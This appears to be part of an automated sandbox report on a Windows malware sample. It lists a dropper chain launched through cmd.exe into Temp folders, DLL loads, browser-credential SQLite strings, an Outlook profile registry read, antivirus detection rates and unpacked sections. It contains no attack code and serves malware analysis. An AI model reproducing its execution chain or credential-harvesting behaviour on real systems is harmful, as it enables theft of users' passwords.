Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: EZrw1nNIpG.exe, 00000000.00000003.2247294432.0000000022E94000.00000004.00000020.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000003.2262587560.0000000022E88000.00000004.00000020.00020000.00000000.sdmp, DGHIDAFCGIEHIEBFCFBA.0.dr, HCGCAAKJDHJJJJJKKKFB.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: EZrw1nNIpG.exe, 00000000.00000002.2417526621.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, EZrw1nNIpG.exe, 00000000.00000002.2403659562.000000001CF1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: EZrw1nNIpG.exe ReversingLabs: Detection: 50%
Source: EZrw1nNIpG.exe Virustotal: Detection: 54%
Source: KKEBKJJDGH.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explortu.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe File read: C:\Users\user\Desktop\EZrw1nNIpG.exe
Source: unknown Process created: C:\Users\user\Desktop\EZrw1nNIpG.exe "C:\Users\user\Desktop\EZrw1nNIpG.exe"
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe "C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJKFIIIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe "C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe"
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Process created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe"
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Process created: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe "C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe"
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wininet.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: mozglue.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: msvcp140.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: vcruntime140.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: pcacli.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: duser.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47mrm.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uianimation.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\KKEBKJJDGH.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000022001\3eb62d09c2.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: EZrw1nNIpG.exe Static file information: File size 2535424 > 1048576
Source: EZrw1nNIpG.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x227c00
Source: Binary string: mozglue.pdbP source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2418656540.000000006C9FF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: EZrw1nNIpG.exe, 00000000.00000002.2417867750.000000006C83D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\EZrw1nNIpG.exe Unpacked PE file: 0.2.EZrw1nNIpG.exe.810000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
